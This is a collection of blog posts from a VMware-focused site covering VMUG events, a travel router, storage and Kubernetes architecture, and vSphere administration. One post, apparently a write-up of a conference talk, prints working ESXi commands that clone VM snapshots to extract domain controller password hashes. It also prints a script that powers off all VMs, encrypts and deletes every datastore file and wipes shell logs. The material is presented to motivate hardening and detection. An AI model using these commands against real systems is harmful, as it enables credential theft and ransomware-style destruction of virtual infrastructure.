NFS mount handled at runtime
Optional debug mode for visibility
No unnecessary services or dependencies

It’s designed to do one thing well, and stay out of the way while doing it.

A Couple of Caveats #

It requires privileged mode for NFS mounting
In my testing, mounting as NFS 4 works when running on Synology; NFS 4.1 does not work.
If running on Synology, the external port for the container needs to be something other than the default rsync port 873, since that port is already in use on Synology (the port is configurable in the Hyper Backup destination setup)
It currently has no authentication added, neither for the rsync front end nor for the NFS mount. My setup doesn’t require it, but I might add it in a later version if there is a need for it.

Workaround or adapter layer? Both? #

This isn’t a workaround in the messy sense. It’s more of an adapter layer. Instead of forcing Synology to support remote NFS roots (which it won’t), we introduce something that fits neatly into both worlds. Sometimes the cleanest architecture isn’t the one that removes friction. It’s the one that contains it.

Closing Thoughts #

Not every system integrates cleanly with every other system, and that’s okay. I’m surprised that I couldn’t back up directly to a mounted NFS export, but that’s just how it is. The trick is recognizing when to bend the environment and when to insert a small, well-defined boundary that does the translation for you. In this case, a tiny rsync daemon turned out to be the missing piece. And once it’s in place, everything just works the way I want it to.
---

# VMUG Connect 2026 Amsterdam – Security, Community, and the Reality of "Living with IT"

URL: https://vNinja.net/2026/03/20/vmug-connect-2026-amsterdam-security-community-living-with-it/
Date: 2026-03-20
Author: christian
Tags: VMUG, VMUG Connect, VMware

This past week I attended VMUG Connect 2026 Amsterdam at RAI Amsterdam. This was the first VMUG Connect event ever held in Europe, and that alone made it a notable milestone. It also showed in the level of interest: around 550 attendees filled the venue, with sessions, hallways, and networking areas consistently busy throughout the event. VMUG Connect continues to be one of the more relevant gatherings for anyone working with VMware technologies. This year’s edition in Amsterdam built on that, with a clear structure around the themes “Thrive in Tech”, “Solutions in Action”, “Master VMware”, and “Get Hands-On”. The result was a focused program that reflected how people actually work with the platform—covering real challenges, practical approaches, and hands-on learning, without drifting into abstraction.

The Strength of the Community #

The community aspect remains the defining part of VMUG. Between sessions, during breaks, and throughout the event, conversations stayed grounded in real-world experience. Discussions weren’t about polished narratives, they were about how things actually work, what breaks, and how people deal with it. That openness is what makes these events valuable. It’s not just the sessions, it’s the ability to talk directly with peers who are solving similar problems.

My Sessions #

PreConnect: Security — All Things Security #

The event opened with the PreConnect: Security — All Things Security panel, hosted by Yves Hertoghs, with the following co-panelists:

Chris McCain (Broadcom)
Marc van de Logt (PQR)
Chris Mentjox (Broadcom)
Dimitri Desmidt (Broadcom)

Going into the session, the format itself was a bit of a surprise.
I was expecting to be a part of a smaller discussion around security, but it turned out to be a panel discussion! That format worked well in the end—it created a more dynamic conversation, especially in a fully packed room. There was a lot of audience participation, and the interaction between the panel and attendees kept the discussion engaging throughout. It felt less like a presentation and more like a shared discussion, which fit the topic well. The discussion focused on how security is approached in real environments today. Rather than staying at a high level, the conversation stayed practical—covering challenges, trade-offs, and how teams are dealing with increasing complexity and pressure.

Hypervisor Horror: Root Access and Regulatory Rage #

Together with Stine Elise Larsen, I had the opportunity to present “Hypervisor Horror: Root Access and Regulatory Rage.” For Stine, this was her first international speaking session, which made the experience particularly meaningful. Presenting together on an international stage added an extra layer to the session. Thanks to everyone who attended (quite a few of you ended up with standing room only), and for the very warm welcome you gave her when I tried to throw her off a bit by pointing out that this was a first! Hint: She absolutely nailed it.

The focus was on what happens at the hypervisor level when things go wrong—specifically how root access can be abused within ESX environments. From there, the discussion moved into how native tools can be used for persistence and activity that blends in with normal operations. Detection and visibility remain the core challenge in these scenarios, especially when attackers rely on what’s already available within the system.

Final Thoughts #

VMUG Connect 2026 Amsterdam delivered exactly what you’d expect from a VMUG event. Focused sessions, practical content, and a strong community presence.
Being the first Connect event in Europe made it feel like a meaningful addition to the calendar, especially given the absence of large-scale VMware events like VMware Explore Europe. It was a pleasure to attend, and meeting up with this many community members again in one place is something that I have been missing. The combination of practical sessions, real-world discussions, and a community that’s willing to share openly is what continues to make VMUG events relevant. Not polished. Not artificial. Just real, and that’s exactly why it works. Kudos to the VMUG team who made this happen, I am sure the Connect series will be back in Europe in 2027 as well! Lastly, thanks to all my fellow VMUG leaders and vExperts who I met this week; you made this event! Thanks for the smiles, laughter, discussions, food, and (Peruvian) beer!

---

# Will We See YOU at VMUG Connect 2026 in Amsterdam?

URL: https://vNinja.net/2025/12/21/vmug-connect-2026-amsterdam-session/
Date: 2025-12-21
Author: christian
Tags: VMUG, VMUG Connect, VMware

Yes, that right there is a we in the title! We’re thrilled to announce that mine and Stine’s joint session, Hypervisor Horror: Root Access and Regulatory Rage, has been selected for the first European VMUG Connect in Amsterdam, 17th – 19th March 2026! Thank you to VMUG for the opportunity — we’re incredibly excited to engage with the VMUG community, connect with fellow practitioners, and be part of an outstanding speaker lineup at this year’s event. VMUG Connect is expanding in 2026 into a multi-day powerhouse event designed for deeper technical dives, richer discussions, hands-on labs, curated learning tracks, inspiring keynotes, and meaningful in-person connections with VMware professionals from around the world. Registration for VMUG Connect is open now!
Session Abstract #

Hypervisor Horror: Root Access and Regulatory Rage

vSphere and VMware Cloud Foundation (VCF) environments are critical to enterprise infrastructure — but what happens when someone gains root access? Attackers are increasingly leveraging Living off the Land (LotL) techniques, using native ESXi commands and services to stealthily manipulate VMs, snapshots, and configurations, all while evading traditional detection. These subtle techniques can have devastating effects if hosts are not properly hardened. In this session, we’ll dive deep into real-world LotL ESXi techniques and demonstrate how attackers exploit hypervisors to gain persistent access. Attendees will learn practical strategies for defending VCF environments by applying industry best practices and hardening standards, including NIST guidelines, CIS Benchmarks, and the MITRE ATT&CK framework. We will cover host hardening, monitoring and logging, configuration enforcement, and automated detection methods, giving administrators and security engineers the tools to prevent hypervisor compromise and protect the entire virtual infrastructure.

Tentative session details #

Track: Thrive in Tech
Time Slot: March 18, 10:45 AM – 11:30 AM
Format: Breakout

See You at VMUG Connect Amsterdam!

We’re looking forward to meeting you in Amsterdam and connecting with the broader VMUG community. Whether you’re attending for deep technical sessions, hands-on learning, or the opportunity to network with peers and industry experts, VMUG Connect is a fantastic place to learn, exchange ideas, and grow together. If you’re attending the event, we’d love to see you in our session and chat with you throughout the conference!

---

# VMUG Connect is expanding in 2026 with five stops!

URL: https://vNinja.net/2025/11/24/vmug-connect-2026/
Date: 2025-11-24
Author: christian
Tags: VMUG, VMUG Connect, VMware

After a successful launch in St. Louis this year, VMUG is bringing the experience to more communities.
Next year, VMUG Connect will give members across these cities a chance to connect, learn, and collaborate in person.

2026 VMUG Connect cities, dates, and venues #

Amsterdam 17–19 March – RAI Amsterdam
Minneapolis 7–9 April – Hilton Minneapolis
Toronto 12–14 May – Hilton Toronto/Markham Suites
Dallas 9–11 June – Hyatt Regency Dallas
Orlando 20–22 October – Caribe Royale Orlando

VMUG Connect delivers days packed with real conversations, technical sessions, and time to engage with VMware users, partners, and experts. Each stop reflects its local community and the topics that matter most.

Call for Papers! Have a session idea, best practice, or unique story to share? VMUG Connect wants to hear from you. Submit your proposal by December 20 to present at one of the events.

What to expect #

Four dynamic content tracks: Build Better. Optimize Smarter; Real Stories. Real Impact; Grow. Adapt. Lead; Lab It. Learn It. Live It.
Hands-on labs, on-site certification exams, product demos, and panel discussions
Career-focused sessions, Q&A with experts, and networking opportunities
Social events, swag, giveaways, and VIP perks for VMUG Advantage members

As the program grows, VMUG will continue adapting VMUG Connect to what members, partners, and the wider industry need, keeping it relevant, practical, and community-driven for years to come. It looks like both Stine and I will be at the Amsterdam event in March, and we might even take the stage for a session.

---

# vSphere: It's All Fun and Games Until Someone Gets Root

URL: https://vNinja.net/2025/09/18/vsphere-its-all-fun-and-games-until-someone-gets-root/
Date: 2025-09-18
Author: christian
Tags: VMware, vSphere, ESXi, Security

UK VMUG UserCon 2025. Photo by Chris Bradshaw

At the VMUG UserCon UK 2025 I presented a session called “vSphere: It’s All Fun and Games Until Someone Gets Root”. The premise of the talk was the havoc a malicious actor can wreak in an environment, if they gain root access to an ESXi host.
(YouTube recording, sadly audio only until the 21 minute mark)

Of course, once someone has gained root access, all bets are off anyway, but there are some interesting techniques that can be utilized simply by using native commands. This is otherwise known as Living off The Land (LOTL), where attackers use legitimate tools and features that are already present on a system, without the need for any external binaries or scripts.

LOLbins for ESXi #

LOLBins, or Living Off the Land Binaries, for ESXi hosts are interesting. These tools require no external dependencies, or code, to run, which means that the ESXi Advanced setting VMkernel.Boot.execInstalledOnly will not prevent them from running at all. Besides, if someone has root access to an ESXi host, they can just turn the setting off anyway.

Rogue / Ghost VMs #

Shown at Explore 2025 in Barcelona, and published in Beware Of The Rogue VMs! This procedure still works in ESXi 8 and ESX 9. However, if the environment is running Distributed Switches and/or NSX, it is not easy to give a Rogue VM network access, since the nature of those setups requires the VMs to be registered properly in vCenter. Rogue VMs might still be useful in such an environment, as the method of exfiltrating data from VMs still works without network access for the VM itself — as long as you can reach the console of it somehow.

Exfiltrating data from VMs #

This section builds on the Rogue VM section, but the technique can be utilized on any VM, registered or not.

Creating and cloning a snapshot #

```
vim-cmd vmsvc/getallvms | grep win-vm01
vim-cmd vmsvc/snapshot.create 44 my_evil_snapshot 0 0
vmkfstools -i win-vm01_2.vmdk clone.vmdk
```

By utilizing the vim-cmd vmsvc/snapshot.create command, an attacker can create a snapshot of a running VM. Identify the VM to snapshot (line 1), and create the snapshot (line 2). vmkfstools can then be used to clone the snapshot into an independent .vmdk file (line 3).
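The VM ID passed to snapshot.create (44 above) comes straight out of the first column of vim-cmd vmsvc/getallvms. A quick sketch of pulling out the ID for a given VM name; the sample output below is illustrative, the real listing has more columns:

```shell
# Illustrative sample of `vim-cmd vmsvc/getallvms` output (header + one VM)
sample='Vmid   Name       File                                  Guest OS                 Version
44     win-vm01   [datastore1] win-vm01/win-vm01.vmx   windows2019srv_64Guest   vmx-19'

# Skip the header line and print "<id> <name>" for the VM we care about
printf '%s\n' "$sample" | awk 'NR>1 && $2 == "win-vm01" {print $1, $2}'
# → 44 win-vm01
```

The same awk pattern is what drives the power-off loop later in this post.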
This is barely visible in the vCenter Client (if at all), so it shouldn’t raise any eyebrows.

Add the cloned disk to a VM #

In this case there is a running Rogue VM that I want to attach the newly cloned .vmdk file to, so I need to stop it from running to be able to add the disk to it. Normally this could be done with vim-cmd vmsvc/device.diskaddexisting, but since the Rogue VM by nature is unregistered on the ESXi host, attaching the .vmdk file has to be done in a different manner.

Stop the Rogue VM #

By using esxcli vm process list I can identify the world-id associated with my VM and kill it with esxcli vm process kill -t force --world-id <id>.

```
esxcli vm process list
esxcli vm process kill -t force --world-id <id>
```

Edit the VM .vmx file #

Once the Rogue VM is no longer running, the .vmx file can be edited and the clone.vmdk file attached.

```
scsi0:1.deviceType = "scsi-hardDisk"
scsi0:1.fileName = "/vmfs/volumes/68b81584-ef417095-8ff0-00505691514a/win-vm01/clone.vmdk"
sched.scsi0:1.shares = "normal"
sched.scsi0:1.throughputCap = "off"
scsi0:1.present = "TRUE"
```

After adding the disk the Rogue VM can be restarted, and the .vmdk is available to it. Mounting the drive gives full access to all files, without turning off the original VM. This way NTDS.DIT and SYSTEM registry hives can be extracted from a Windows Server Domain Controller for offline password cracking with tools like Hashcat, as well as saved browser credentials or other files of interest, mostly without visible traces in the vSphere Client. The snapshot created earlier will be visible, so removing it after the clone operation would be a good idea. Something similar has been seen in the wild by Scattered Spider, but their approach has been more of a brute-force one. Their tactic has been to power off VMs and then attach the powered-off VM’s .vmdk file to a VM under their control.
My example here utilizes cloned snapshots instead, something that is less likely to cause alerts in the environment as there is no need to turn off VMs to access their disks. If the VM used for extraction purposes does not have network access, adding a second small .vmdk file to it where extracted files are placed would make it trivial to copy that .vmdk from the Datastore it is located on out from the host via SSH, instead of exfiltrating large .vmdk files.

Encrypting VMs #

It is fairly simple to encrypt all files on a filesystem that ESXi can write to, without any external binaries or code.

```
for vmid in $(vim-cmd vmsvc/getallvms | awk 'NR>1 {print $1}'); do
  vim-cmd vmsvc/power.off "$vmid"
done &&
find . -type f ! -name '*.ohshit' -print0 |
  xargs -0 -P 10 -n 1 -I{} sh -c '
    openssl enc -aes-256-cbc -md sha256 -pbkdf2 -salt \
      -pass pass:"$MYPASS" \
      -in "$1" -out "$1.ohshit" && rm "$1"
  ' _ "{}" &&

>/.ash_history &&
>/var/log/shell.log
```

Explanation #

Line 1-2: The for loop iterates through the following commands: vim-cmd vmsvc/getallvms → lists all registered VMs on a VMware ESXi host. awk 'NR>1 {print $1}' → skips the header line and extracts just the first column (the VM IDs). It then runs vim-cmd vmsvc/power.off for each VM ID to ensure the VM is not running, and its files are accessible by the next commands.

Line 4-9: Proceeds to use openssl to encrypt and salt all files it finds, with the password stored in the $MYPASS environment variable.

find . -type f → recursively find all files.
! -name '*.ohshit' → skip already-encrypted files.
-print0 + xargs -0 → safe for spaces/newlines in filenames.
-P 10 → run up to 10 encryptions in parallel.

For each file:

openssl enc -aes-256-cbc -md sha256 -salt -pbkdf2 -pass pass:"$MYPASS" → encrypt and salt with AES-256 using $MYPASS as the password.
-out "$1.ohshit" → writes the encrypted file with a .ohshit extension.
&& rm "$1" → deletes the original file once encryption succeeds.
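To see what that openssl invocation actually does to a file, here is the same encrypt step in isolation, plus the matching decrypt, run against a throwaway file on a regular Linux box (the file name and password are just examples). The point is that the data is only recoverable if the password survives somewhere:

```shell
MYPASS=demo-password
printf 'scsi0:0.present = "TRUE"' > /tmp/demo.vmx

# Encrypt with the exact flags from the script, then remove the original
openssl enc -aes-256-cbc -md sha256 -pbkdf2 -salt \
  -pass pass:"$MYPASS" \
  -in /tmp/demo.vmx -out /tmp/demo.vmx.ohshit && rm /tmp/demo.vmx

# Recovery is only possible with the same password (-d decrypts)
openssl enc -d -aes-256-cbc -md sha256 -pbkdf2 \
  -pass pass:"$MYPASS" \
  -in /tmp/demo.vmx.ohshit -out /tmp/demo.vmx
cat /tmp/demo.vmx
# → scsi0:0.present = "TRUE"
```

This is also why the script truncates the shell history afterwards: without $MYPASS, the .ohshit files are effectively unrecoverable.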
All files get encrypted and replaced with a .ohshit file.

Line 11-12: >/.ash_history → truncates the BusyBox ash shell history. >/var/log/shell.log → truncates the shell log file. This simply empties out the BusyBox history, and the ESXi host’s shell.log, to ensure that the password used for encryption isn’t easily retrieved.

In summary, this shell script powers off all registered VMs on a host, runs through the datastore it’s run on, encrypts all files it can touch, and cleans up log files once it’s done. All with native tools provided by any ESXi host by default. Now this is not the fastest, or most efficient, way to encrypt large files, but it shows that it is possible by just utilizing built-in commands and tools. Even if the encryption here takes a while to complete for the larger .vmdk files, the smaller .vmx files encrypt very quickly, making it hard to power on VMs again once this has started churning through the files.

Summary #

Utilizing native tools already present on an ESXi system in malicious ways is fairly simple. The tools used here have real legitimate administrative purposes, but they can also be used for “alternative” purposes. There are many examples of Living off The Land techniques being utilized in the wild by malicious actors. Going forward my hope is that ESXi goes the route of Talos and implements an authenticated API-only approach. There really shouldn’t be a need for logging into an ESXi host with root privileges at all.

---

# GL-iNet Opal (GL-SFT1200) Travel Router: Real Usage Experience

URL: https://vNinja.net/2025/09/15/gl-inet-opal-travel-router-experience/
Date: 2025-09-15
Author: christian
Tags: GL-iNet, Networking, DNS, WireGuard, Opal

In August 2024, I acquired a GL.iNet Opal (GL-SFT1200) Travel Router, and it has since become an indispensable companion for my multi-day travels. Its compact design and robust feature set have consistently met my connectivity needs on the road.
Real-World Use #

Over the past year, the Opal has been tested in various accommodations, including hotels and guesthouses, without any connectivity issues. Its versatility is evident as it seamlessly handles both wired uplinks and wireless repeater modes, even in environments with captive portals. A notable feature is the ability to configure a dedicated “travel WiFi” SSID. This setup ensures that all my devices connect automatically without the need for repeated authentication at each new location. This convenience is particularly beneficial during extended stays, where maintaining a consistent network environment is crucial. Additionally, I often travel with an Apple TV. Configuring the Opal to support this device has enabled smooth streaming experiences, allowing for uninterrupted media consumption during downtime. The Opal also handles multiple devices simultaneously with surprising stability. Its small form factor makes it easy to pack, but it delivers more capability than its size suggests.

Security and Privacy #

The Opal’s security features enhance its appeal. It supports WireGuard VPN out of the box, facilitating secure tunneling back to my home network. VPN throughput peaks at roughly 65 Mbps, which is more than sufficient for typical hotel internet speeds and ensures secure browsing across multiple devices. I’ve also configured DNS-over-TLS to forward all DNS queries back to my Pi-hole at home. This not only encrypts DNS traffic but also provides ad-free browsing on the road, effectively replicating the experience of my home network.

Performance Considerations #

While the Opal offers commendable performance, it’s important to understand its limitations. The device supports:

Wired LAN/WAN: Up to 300 Mbps
WiFi (2.4 GHz): Up to 300 Mbps
WiFi (5 GHz): Up to 867 Mbps

These numbers are sufficient for most travel scenarios, including streaming and general browsing.
However, for tasks requiring higher bandwidth—large file transfers, high-definition video conferencing—the Opal’s throughput may become a limiting factor. For more demanding use cases, GL.iNet offers more powerful travel routers such as the Beryl AX (GL-MT3000) and Slate AX (GL-AXT1800). Both feature WiFi 6 and higher VPN throughput, making them better suited for users who need speed as well as flexibility.

Verdict #

The GL.iNet Opal (GL-SFT1200) Travel Router strikes a balance between portability, functionality, and security. Its ability to provide a stable and secure network connection in a variety of travel scenarios makes it a valuable tool for frequent travelers. While it may not offer the fastest speeds, its features and reliability make it a consistently useful companion. Between persistent travel SSIDs, WireGuard VPN, and DNS-over-TLS to my Pi-hole, the Opal transforms what would otherwise be a tedious travel WiFi experience into something seamless, secure, and ad-free. In short, it has delivered exactly what it promises without hassle.

---

# vSphere LCM Moving From Baselines to Images

URL: https://vNinja.net/2025/09/12/vsphere-moving-from-baselines-to-images/
Date: 2025-09-12
Author: stine
Tags: VMware, vSphere, ESXi

If you are using baselines to update your VMware clusters and see this message on your cluster, then it’s about time to move from baseline updating to vSphere Lifecycle Manager images (vLCM).

Here’s a quick guide to how this can be done #

Navigate to your cluster – Updates and pick “manage with a single image”:
Pick “setup image manually”:
When the “convert to an image” menu appears you are presented with choices on what ESXi version you want your cluster to use, vendor addon, firmware and drivers addon, and components:
Pick the right configuration you want for your cluster and check that all your choices are compatible by checking with the “validate” button.
When you are satisfied with your configuration and everything is valid, press “finish setup”: You are now using vLCM images to update your cluster!

---

# Storage in Hypervisor and Kubernetes Environments: What Are the Options?

URL: https://vNinja.net/2025/09/12/storage-in-hypervisor-and-kubernetes-environments/
Date: 2025-09-12
Author: christian
Tags: Kubernetes, k8s, Containers, Virtualization, Hypervisor, KubeVirt, Storage

When talking about modern infrastructure, storage is as critical as compute and networking. Applications — whether traditional VMs or cloud-native containers — depend on reliable, performant, and consistent storage. I’ll focus on three common approaches to storage in mixed Kubernetes + hypervisor environments:

Hypervisor-based storage (VM-centric, provided by the virtualization platform).
Kubernetes-managed storage (container-centric, via CSI plugins).
Integrated/hybrid storage models (shared storage pools accessible to both VMs and containers).

Note: These are general architectural patterns, not tied to any single hypervisor or storage vendor. Real-world implementations may vary.

1. Hypervisor-Based Storage #

In this model, storage is managed at the hypervisor layer. VMs consume storage as virtual disks. Kubernetes nodes (running in VMs) see these as block devices. Persistent storage for pods depends on attaching volumes through the VM layer.

Diagram:

```mermaid
flowchart TB
    classDef storage fill:#FFD580,stroke:#333,stroke-width:1px;
    classDef vm fill:#ADD8E6,stroke:#333,stroke-width:2px;
    classDef pod fill:#90EE90,stroke:#333,stroke-width:1px;
    A["Physical Server"] --> B["Hypervisor"]
    B --> C["VM: K8s Node"]
    C --> P1["Pod: App"]
    B --> S["Hypervisor Storage"]
    S -.-> C
    C -.-> P1
    class S storage;
    class C vm;
    class P1 pod;
```

Figure 1: Hypervisor provides primary storage. Pods consume volumes indirectly via VM disks.

Pros: Mature, enterprise-grade features (snapshots, replication, HA). Existing investments in hypervisor storage can be reused.
Cons: Indirect path for containers (pod → VM → hypervisor → storage). Limited Kubernetes-native flexibility.

2. Kubernetes-Managed Storage #

Here, Kubernetes manages storage directly using the Container Storage Interface (CSI). Pods request storage via PersistentVolumeClaims (PVCs). Backed by CSI drivers for different storage systems. Kubernetes abstracts the underlying system, making it container-first. See the CSI overview for more details.

Diagram:

```mermaid
flowchart TB
    classDef storage fill:#FFD580,stroke:#333,stroke-width:1px;
    classDef node fill:#ADD8E6,stroke:#333,stroke-width:2px;
    classDef pod fill:#90EE90,stroke:#333,stroke-width:1px;
    X["K8s Node"] --> P["Pod: App"]
    X --> CSI["CSI Driver"]
    CSI --> DS["Storage System"]
    class X node;
    class P pod;
    class DS storage;
```

Figure 2: Kubernetes manages storage directly using CSI plugins. Pods request PersistentVolumes via PVCs.

Pros: Kubernetes-native workflows (PVCs, dynamic provisioning). Portable across environments. Scales with the cluster.

Cons: Requires CSI integration. Features (e.g., snapshots, encryption) depend on the storage backend.

3. Integrated / Hybrid Storage Models #

Some environments expose shared storage pools to both VMs and Kubernetes. Hypervisor workloads and container workloads use the same underlying storage system. Example: hypervisor storage made available to Kubernetes through a CSI driver.

Diagram:

```mermaid
flowchart TB
    classDef storage fill:#FFD580,stroke:#333,stroke-width:1px;
    classDef vm fill:#ADD8E6,stroke:#333,stroke-width:2px;
    classDef pod fill:#90EE90,stroke:#333,stroke-width:1px;
    A["Physical Server"] --> H["Hypervisor"]
    H --> VM["VM: App"]
    H --> K["K8s Node"]
    K --> P["Pod: App"]
    H --> S["Shared Storage Pool"]
    S -.-> VM
    S -.-> K
    K -.-> P
    class S storage;
    class VM,K vm;
    class P pod;
```

Figure 3: Shared storage pool used by both VMs and Kubernetes pods.

Pros: Unified storage strategy for VMs and containers. Simplifies operations. Easier data mobility across environments.

Cons: More complex integration.
May require specific vendor solutions.

Storage Comparison Diagram #

To summarize, here’s a visual comparison of how storage flows in each model:

```mermaid
flowchart LR
    classDef storage fill:#FFD580,stroke:#333,stroke-width:1px;
    classDef vm fill:#ADD8E6,stroke:#333,stroke-width:2px;
    classDef pod fill:#90EE90,stroke:#333,stroke-width:1px;
    O1H["Hypervisor"] --> O1VM["VM: K8s Node"]
    O1VM --> O1P["Pod: App"]
    O1H --> O1S["Hypervisor Storage"]
    O1S -.-> O1VM
    O1VM -.-> O1P
    O2N["K8s Node"] --> O2P["Pod: App"]
    O2N --> O2C["CSI Driver"]
    O2C --> O2S["Storage System"]
    O3H["Hypervisor"] --> O3VM["VM: App"]
    O3H --> O3K["K8s Node"]
    O3K --> O3P["Pod: App"]
    O3H --> O3S["Shared Storage Pool"]
    O3S -.-> O3VM
    O3S -.-> O3K
    O3K -.-> O3P
    class O1S,O2S,O3S storage;
    class O1VM,O3VM,O2N,O3K vm;
    class O1P,O2P,O3P pod;
```

Figure 4: Comparison of storage models across hypervisor-based, Kubernetes-managed, and hybrid environments.

Performance Comparison #

| Option | Latency | Throughput | Scalability |
|---|---|---|---|
| 1. Hypervisor-based | Higher (extra VM layer) | Good for VM-centric workloads | Scales with hypervisor cluster |
| 2. Kubernetes-managed (CSI) | Lower (direct to storage) | Scales with Kubernetes cluster | Highly scalable with CSI drivers |
| 3. Integrated/Hybrid | Medium (shared layer adds overhead) | Balanced across VMs and pods | Scales with both hypervisor + Kubernetes |

Choosing the Right Storage Model #

| Option | Description | Pros | Cons |
|---|---|---|---|
| 1. Hypervisor-based | VMs own storage; pods consume via VM disks | Mature features, reuse existing storage | Indirect for pods, less flexible |
| 2. Kubernetes-managed (CSI) | Kubernetes directly provisions storage | Native integration, portable | Depends on CSI backend, may lack enterprise features |
| 3. Integrated/Hybrid | Shared pool for VMs and pods | Unified strategy, easier mobility | Complex integration, vendor lock-in |

Workload Considerations #

VM-heavy workloads: Hypervisor-based or hybrid models may be more efficient.
Container-first workloads: Kubernetes-managed CSI storage is often best.
Mixed workloads: Hybrid approaches provide the most flexibility. Summary # Storage design in Kubernetes + hypervisor environments is about balancing maturity, flexibility, and integration: Hypervisor storage is stable and feature-rich but less Kubernetes-native. Kubernetes CSI offers portability and container-first workflows (CSI overview). Hybrid models unify the storage plane for both worlds but can add complexity. As with compute and networking, the right storage model depends on your workload priorities and operational requirements. --- # Containers in Your Hypervisor vs. VMs in Kubernetes: What’s the Difference? URL: https://vNinja.net/2025/09/11/containers-in-your-hypervisor-or-vms-in-kubernetes/ Date: 2025-09-11 Author: christian Tags: Kubernetes, k8s, Containers, Virtualization, Hypervisor, KubeVirt When talking about modern infrastructure, there are multiple ways to combine virtualization and Kubernetes. I’ll focus on three common approaches: Kubernetes running directly on the hypervisor alongside traditional VMs. Kubernetes running inside VMs on a hypervisor. VMs running inside Kubernetes (via KubeVirt). The architectures described below are general concepts and not specific to any single hypervisor. They illustrate common patterns for combining virtualization and Kubernetes, but exact implementations may vary depending on your infrastructure vendor and setup. Storage is covered in Part 2 — this overview focuses on compute and networking. Persistent storage integration is a separate design consideration. 1. Kubernetes Directly on the Hypervisor # In this model: The hypervisor runs traditional VMs for legacy workloads. A Kubernetes cluster runs directly on the hypervisor to manage containers as pods. Pods can represent cloud-native applications without requiring an extra VM layer. 
Diagram: flowchart TB classDef node fill:#ADD8E6,stroke:#333,stroke-width:2px; classDef pod fill:#90EE90,stroke:#333,stroke-width:1px; A["Physical Server"] --> B["Hypervisor"] B --> C["VM: Full OS"] B --> K["K8s Node(s)"] K --> P1["Cloud Native App A"] K --> P2["Cloud Native App B"] class C,K node; class P1,P2 pod; Figure 1: Hypervisor model. A traditional VM runs a full OS (light blue), and a Kubernetes cluster (light cyan node) runs directly on the hypervisor managing multiple cloud-native app pods (light green). Network isolation is possible depending on hypervisor and CNI configuration. This setup allows for common management of both traditional VMs and Kubernetes nodes. Key points: Kubernetes nodes run directly on the hypervisor, alongside other VMs. Provides common management with other hypervisor workloads — everything can be managed through the same hypervisor tools. Pods run directly on cluster nodes on the hypervisor. Isolation depends on hypervisor networking and CNI configuration; snapshots/migration can be more complex. 2. Kubernetes Inside VMs # Some organizations prefer to run Kubernetes inside VMs on a hypervisor: Hypervisor provides VMs with full OS isolation. Kubernetes runs inside one or more of these VMs. Pods run inside the Kubernetes cluster, which itself is inside VMs. Diagram: flowchart TB classDef node fill:#ADD8E6,stroke:#333,stroke-width:2px; classDef pod fill:#90EE90,stroke:#333,stroke-width:1px; A["Physical Server"] --> B["Hypervisor"] B --> VM1["VM 1: K8s Node"] B --> VM2["VM 2: K8s Node"] VM1 --> P1["Cloud Native App A"] VM2 --> P2["Cloud Native App B"] class VM1,VM2 node; class P1,P2 pod; Figure 2: Kubernetes cluster running inside VMs. Each VM (light blue) contains a Kubernetes node which manages pods (light green). Network isolation is strong due to VM boundaries. Key points: Adds an extra layer of isolation using VMs. Useful for multi-tenant environments or when compliance requires OS-level separation. 
Slightly more complex infrastructure compared to running Kubernetes directly on the hypervisor. 3. VMs Inside Kubernetes (KubeVirt) # Kubernetes becomes the control plane and manages VMs as workloads using KubeVirt: Kubernetes manages both pods (containers) and VMs. VMs can host traditional workloads or cloud-native applications. This unifies management under Kubernetes for hybrid workloads. Diagram: flowchart TB classDef node fill:#ADD8E6,stroke:#333,stroke-width:2px; classDef pod fill:#90EE90,stroke:#333,stroke-width:1px; X["Physical Server"] --> Y["Kubernetes Cluster"] Y --> P["Pod: Cloud Native App"] Y --> Q["Pod: VM (KubeVirt)"] Q --> Q1["Legacy App"] class Y,Q node; class P,Q1 pod; Figure 3: VMs managed as pods inside a Kubernetes cluster. Pod container is light green, VM node light blue, Cloud Native App highlighted in gold. Choosing the Right Model #

| Option | Description | Pros | Cons |
|---|---|---|---|
| 1. Kubernetes on Hypervisor | Kubernetes cluster runs directly on the hypervisor, alongside traditional VMs | Unified management with other hypervisor workloads, no extra VM layer | More complex to manage, isolation depends on network configuration, harder to migrate or snapshot Kubernetes nodes |
| 2. Kubernetes inside VMs | Kubernetes cluster runs inside VMs on a hypervisor | Strong OS-level isolation, multi-tenant friendly | Extra layer, slightly more complex |
| 3. VMs inside Kubernetes (KubeVirt) | Kubernetes manages both pods and VMs | Single control plane for all workloads, hybrid-ready | Learning curve, adds Kubernetes dependency for VM workloads |

Workload Considerations # Traditional VMs primary workload: Option 1 or 2 might be better. Cloud-native container primary workload: Option 3 is likely more suitable. Consider management, isolation, and operational complexity. Networking Considerations #

| Option | Networking | Isolation | Complexity |
|---|---|---|---|
| 1. Kubernetes on Hypervisor | Pods → hypervisor network; CNI (learn more) | Depends on configuration | Low-to-moderate |
| 2. Kubernetes inside VMs | Pods → VM network → hypervisor | Strong | Moderate-to-high |
| 3. VMs inside Kubernetes | Pods & VMs → Kubernetes overlay (KubeVirt) | Moderate | High |

Takeaway: Network setup should reflect isolation, security, and workload requirements. Network Comparison # flowchart TB classDef node fill:#ADD8E6,stroke:#333,stroke-width:2px; classDef net fill:#90EE90,stroke:#333,stroke-width:1px; O1["Kubernetes in Hypervisor"] O2["Kubernetes in VMs"] O3["VMs in Kubernetes (KubeVirt)"] O1_N["Pods → Hypervisor network (CNI)"] O2_N["Pods → VM network → Hypervisor"] O3_N["Pods & VMs → Kubernetes overlay network"] O1 --> O1_N O2 --> O2_N O3 --> O3_N class O1,O2,O3 node; class O1_N,O2_N,O3_N net; Figure 4: Simplified networking comparison. Light blue = nodes/VMs, light green = pod/VM networking layers. Summary # There are multiple ways to deploy containers and VMs, each with different trade-offs: Kubernetes in Hypervisor: Simplest management alongside traditional VMs; network isolation depends on CNI. Kubernetes in VMs: Strong isolation via VM boundaries; slightly more complex setup. VMs in Kubernetes (KubeVirt): Unified control plane for containers and VMs; advanced networking setup. Before selecting a deployment model, carefully consider: Primary workload type: Traditional VMs vs. cloud-native containers. Isolation and security requirements: VM boundaries, network segmentation, CNI configuration. Operational complexity: Management tools, snapshots, migrations, and networking setup. No single approach fits every scenario — the right choice depends on workload, expertise, and infrastructure goals. --- # How to set up a VMware vSphere Native Key Provider (NKP) URL: https://vNinja.net/2025/08/15/how-to-set-up-a-vsphere-native-key-provider/ Date: 2025-08-15 Author: stine Tags: VMware, vSphere, ESXi From VMware vSphere 7.0.2, you can configure a vSphere Native Key Provider (NKP) to enable encryption-related functionality from your vCenter.
